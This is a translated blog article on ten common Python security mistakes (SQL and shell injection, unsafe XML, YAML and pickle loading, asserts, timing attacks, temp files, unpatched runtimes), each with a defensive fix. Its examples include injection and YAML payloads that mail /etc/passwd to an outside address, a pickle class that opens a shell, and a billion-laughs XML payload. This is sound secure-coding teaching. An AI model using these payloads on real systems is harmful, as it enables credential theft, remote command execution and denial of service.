10 most common security bugs in Python and how to avoid them

Translation

Hello!

Our next Python group launched successfully on Monday, but we still have one more piece of material left that we did not manage to publish before the start. We are correcting that now and hope you will like it.

Go!

Writing secure code is hard. When you learn a language, a module, or a framework, you learn how it is supposed to be used. You also need to think about how it can be misused in a security context. Python is no exception: even the standard library documentation describes bad practices for writing hardened applications. Yet many Python developers simply do not know about them.

Here is my top 10 (in no particular order) of the most common security mistakes in applications written in Python.

1. Input injection

There are many types of code injection attacks and they are all quite common. They affect all languages, frameworks and environments.

SQL injection is possible when you write SQL queries directly, rather than using an ORM, and mix string literals with variables. I have read a lot of code where “escaping quotes” is considered a fix. It is not. You can familiarize yourself with the many ways SQL can be injected in this cheat sheet.

Command injection is possible any time you invoke a process with popen, subprocess, or os.system and take the arguments from variables. When calling local commands, someone may be able to set those values to something malicious.

Imagine this simple script [credit]. It calls a subprocess with a file name provided by the user:

import subprocess
def transcode_file(request, filename):
   command = 'ffmpeg -i "{source}" output_file.mpg'.format(source=filename)
   subprocess.call(command, shell=True)  # a bad idea!

The attacker sets the value of filename to "; cat /etc/passwd | mail them@domain.com or something equally dangerous.

Solution:

Sanitize input using the utilities that come with your web framework, if you use one. Unless you have a good reason, do not build SQL queries by hand. Most ORMs have built-in sanitization methods.
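If you do have to write SQL by hand, the usual alternative to string formatting is a parameterized query. Here is a minimal sketch using the standard sqlite3 module; the users table and the find_user helper are made up for illustration and are not part of the original article.

```python
import sqlite3


def find_user(conn, username):
    # The "?" placeholder makes the driver bind the value as data,
    # so it is never parsed as part of the SQL statement.
    cursor = conn.execute(
        "SELECT id, name FROM users WHERE name = ?", (username,)
    )
    return cursor.fetchall()


# Hypothetical in-memory table, only for this demonstration.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
conn.execute("INSERT INTO users (name) VALUES (?)", ("alice",))

rows_ok = find_user(conn, "alice")
# A classic injection string is treated as a (non-matching) name.
rows_attack = find_user(conn, "alice' OR '1'='1")
```

With string formatting, the second call would have matched every row; with a bound parameter it matches none.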

For the shell, use the shlex module to escape the input correctly.
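As a rough sketch of what that can look like for the ffmpeg example above: passing an argument list avoids the shell entirely, and shlex.quote covers the case where a shell string is unavoidable. The helper names below are my own, chosen for illustration.

```python
import shlex
import subprocess


def build_transcode_args(filename):
    # With an argument list there is no shell: the file name is
    # passed to ffmpeg as a single argv entry, whatever it contains.
    return ["ffmpeg", "-i", filename, "output_file.mpg"]


def transcode_file(filename):
    # shell=False is the default for subprocess.call.
    return subprocess.call(build_transcode_args(filename))


def build_shell_command(filename):
    # If a shell string really is required, quote every
    # user-supplied piece with shlex.quote.
    return "ffmpeg -i {} output_file.mpg".format(shlex.quote(filename))
```

The argument-list form is generally the simpler choice, since there is nothing to forget to quote.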

2. Parsing XML

If your application loads and parses XML files, you are probably using one of the XML modules from the standard library. There are a few common attacks through XML. Most are DoS-style (designed to crash the system rather than exfiltrate data). These attacks are quite common, especially if you parse external (i.e. untrusted) XML files.

One of them is called “billion laughs” because of the payload, which usually contains a lot (billions) of “lol”s. The idea is that XML lets you define entities that reference other entities, so when your unassuming XML parser tries to load this file into memory, it consumes gigabytes of RAM. Try it if you don't believe me :-)

<?xml version="1.0"?><!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
 <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
 <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
 <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
 <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
 <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]><lolz>&lol9;</lolz>

Other attacks use external entity expansion. XML supports referencing entities from external URLs, and the XML parser will typically fetch and load that resource without any qualms. “An attacker can bypass firewalls and gain access to restricted resources, since all requests are made from an internal and trusted IP address, and not from outside.”

Another situation worth considering is the third-party packages you depend on that decode XML, such as configuration files or remote APIs. You may not even suspect that one of your dependencies is open to these types of attacks.

What happens in Python? Well, the standard library modules etree, DOM, and xmlrpc are all wide open to these attacks. This is well documented here.

Solution:

Use defusedxml as a drop-in replacement for the standard library modules. It adds safeguards against these types of attacks.
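To give a feel for the kind of safeguard involved, here is a standard-library-only sketch that refuses any document declaring entities, which is what both attacks above rely on. It is an illustration of the idea, not defusedxml's actual implementation, and the function name is hypothetical.

```python
from xml.parsers import expat


def element_names(xml_text):
    """Return the element names in a document, rejecting entity declarations."""
    names = []

    def forbid_entity(*args):
        # Called by expat for every <!ENTITY ...> declaration.
        raise ValueError("entity declarations are not allowed")

    parser = expat.ParserCreate()
    parser.EntityDeclHandler = forbid_entity
    parser.StartElementHandler = lambda name, attrs: names.append(name)
    parser.Parse(xml_text, True)  # True marks this as the final chunk
    return names
```

In real code, defusedxml is the better choice: for example, defusedxml.ElementTree.fromstring can stand in for xml.etree.ElementTree.fromstring.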

3. Assert statements

Do not use assert statements to guard pieces of code that a user should not be able to access. Take this simple example:

def foo(request, user):
    assert user.is_admin, "user does not have access"
    # secure code...

Now, by default, Python runs with __debug__ set to True, but in a production environment it is common to run with optimizations enabled (the -O flag). The assert statement is then skipped and the program goes straight to the protected code, regardless of whether the user is_admin or not.

Solution:

Use assert statements only to communicate with other developers, for example in unit tests or to guard against incorrect use of an API.
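For the access check itself, an explicit condition that raises an exception keeps working under optimization. A minimal sketch of the foo example rewritten that way; the User class and the return value are placeholders I added so the snippet runs on its own.

```python
class User:
    # Hypothetical stand-in for whatever user object the framework provides.
    def __init__(self, is_admin):
        self.is_admin = is_admin


def foo(request, user):
    # An explicit check is not stripped by "python -O", unlike assert.
    if not user.is_admin:
        raise PermissionError("user does not have access")
    # secure code...
    return "secure result"
```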

4. Timing attacks

Timing attacks are essentially a way of exposing a program's behavior and algorithm by measuring how long it takes to compare provided values. Timing attacks require precision, so they usually do not work over a high-latency remote network. Because of the variable latency involved in most web applications, it is almost impossible to mount a timing attack over HTTP web servers.

But if you have a command-line application that prompts for a password, an attacker can write a simple script to time how long it takes to compare their value with the actual secret. Example.

If you want to see how they work, there are some impressive examples, such as this SSH-based timing attack written in Python.

Solution:

Use secrets.compare_digest, introduced in Python 3.6 (or hmac.compare_digest, available since Python 3.3), to compare passwords and other private values.
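A minimal sketch of such a comparison follows. The check_token helper is a name I made up; the point is only that compare_digest takes the place of ==.

```python
import secrets


def check_token(supplied, expected):
    # compare_digest is designed so that its running time does not
    # reveal where the first mismatching character is, unlike ==.
    # Encoding to bytes also allows non-ASCII input.
    return secrets.compare_digest(
        supplied.encode("utf-8"), expected.encode("utf-8")
    )
```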

5. Contaminated site-packages or import path

Python has a very flexible import system. That is great when you are writing monkey patches for your tests or overloading core functionality.

But this is one of the biggest security holes in Python.

Installing third-party packages into your site-packages, whether in a virtual environment or in the global site-packages (which is generally discouraged), exposes you to the security holes in those packages.

There have been cases of packages published to PyPI with names similar to those of popular packages, but which execute arbitrary code. The biggest incident, fortunately, was not malicious and simply made the point that the problem was not being addressed.

Another situation that you need to think about is the dependencies of your dependencies (and so on). They may include vulnerabilities, and they may also override the default behavior in Python through the import system.

Solution:

Vet your packages. Look at PyUp.io and their security service. Use a virtual environment for every application and make sure your global site-packages is as clean as possible. Check package signatures.

6. Temporary files

To create temporary files in Python, you would typically first generate a file name using the mktemp() function and then create a file using that name. “This is not safe because another process can create a file with the same name between the time mktemp() is called and the subsequent attempt to create the file by the first process.” This means it can trick your application into either loading the wrong data or exposing other temporary data.

Recent versions of Python show a runtime warning if you call the insecure function.

Solution:

If you need to create temporary files, use the tempfile module and its mkstemp function.
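A short sketch of the mkstemp pattern: the function creates and opens the file in one step, so there is no window in which another process can claim the name. The write_temp helper is my own naming.

```python
import os
import tempfile


def write_temp(data):
    # mkstemp creates the file and returns an open file descriptor
    # together with the path, so there is no gap between naming
    # and creating the file.
    fd, path = tempfile.mkstemp(suffix=".tmp")
    with os.fdopen(fd, "wb") as handle:
        handle.write(data)
    return path


path = write_temp(b"scratch data")
with open(path, "rb") as handle:
    content = handle.read()
os.remove(path)  # mkstemp leaves cleanup to the caller
```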

7. Using yaml.load

Quoting PyYAML documentation:

Warning: It is not safe to call yaml.load with any data received from an untrusted source! yaml.load is as powerful as pickle.load and so may call any Python function.

This beautiful example was found in the popular Ansible project. You could give Ansible Vault the following value as (valid) YAML. It calls os.system() with the arguments provided in the file.

!!python/object/apply:os.system ["cat /etc/passwd | mail me@hack.c"]

So, by loading YAML from user-supplied values, you are wide open to attack.

A demonstration of this in action, courtesy of Anthony Sottile.

Solution:

Use yaml.safe_load pretty much always, unless you have a really good reason not to.
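To illustrate the difference, here is a small sketch that assumes PyYAML is installed. safe_load builds only plain data types and refuses Python-specific tags such as the one in the payload above; the echo command is a harmless stand-in of mine.

```python
import yaml  # PyYAML, a third-party package

# Ordinary configuration data loads into plain Python types.
config = yaml.safe_load("name: demo\nretries: 3")

# A payload using a Python-specific tag is rejected instead of executed.
payload = '!!python/object/apply:os.system ["echo pwned"]'
try:
    yaml.safe_load(payload)
    rejected = False
except yaml.YAMLError:
    rejected = True
```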

8. Pickles

Deserializing pickle data is just as bad as YAML. Python classes can declare a magic method __reduce__ that returns a string, or a tuple with a callable and the arguments to pass to it; that callable is invoked during unpickling. An attacker can use this to include a reference to one of the subprocess functions and run arbitrary commands on the host.

This interesting example shows how to pickle a class that opens a shell in Python 2. There are many more examples of how to exploit pickle.

import cPickle
import subprocess
import base64

class RunBinSh(object):
    def __reduce__(self):
        return (subprocess.Popen, (('/bin/sh',),))

print base64.b64encode(cPickle.dumps(RunBinSh()))

Solution:

Never unpickle data from an untrusted or unauthenticated source. Instead, use a different serialization format, such as JSON.
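As a rough sketch of the JSON alternative: json.loads can only produce dicts, lists, strings, numbers, booleans and None, so decoding cannot trigger arbitrary callables the way unpickling can. The helper names and the sample state are illustrative.

```python
import json


def dump_state(state):
    # Serialize plain data (dicts, lists, strings, numbers) to bytes.
    return json.dumps(state).encode("utf-8")


def load_state(blob):
    # Decoding yields only basic Python types, never custom objects.
    return json.loads(blob.decode("utf-8"))


blob = dump_state({"user": "alice", "roles": ["admin", "dev"]})
restored = load_state(blob)
```

The trade-off is that custom classes have to be converted to and from plain data explicitly.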

9. Using the system Python runtime and not patching it

Most POSIX systems ship with a version of Python 2. Typically an outdated one.

Since “Python”, that is, CPython, is written in C, there are times when the Python interpreter itself has holes. Common security issues in C are related to memory allocation, such as buffer overflow errors.

Over the years, CPython has had several overrun or overflow vulnerabilities, each of which has been patched and fixed in subsequent releases.

So you are safe. That is, if you patch your runtime.

Here is an example for versions 2.7.13 and below: an integer overflow vulnerability that allows code execution. It affects pretty much any unpatched Ubuntu before version 17.

Solution:

Install the latest version of Python for your production applications, and apply all patches!

10. Not patching your dependencies

Just as you need to patch your runtime, you also need to patch your dependencies regularly.

I find the practice of “pinning” versions of Python packages from PyPI in packages terrifying. The idea is that “these are the versions that work”, so everyone leaves it alone.

All of the vulnerabilities in the code I mentioned above are just as important when they exist in the packages that your application uses. The developers of these packages fix security issues. All the time.

Solution:

Use a service such as PyUp.io to check for updates, raise pull/merge requests against your application, and run your tests to keep packages up to date.

Use a tool such as InSpec to validate the installed versions in production environments and ensure that minimum versions or version ranges are patched.

Have you tried Bandit?

There is a great static linter that will catch all of these issues in your code, and more! It is called bandit; just run pip install bandit and then bandit ./codedir

PyCQA/bandit

Thanks to Red Hat for this great article, which I used in some of my research.

THE END!

As always, we will be glad to see your comments and questions :)
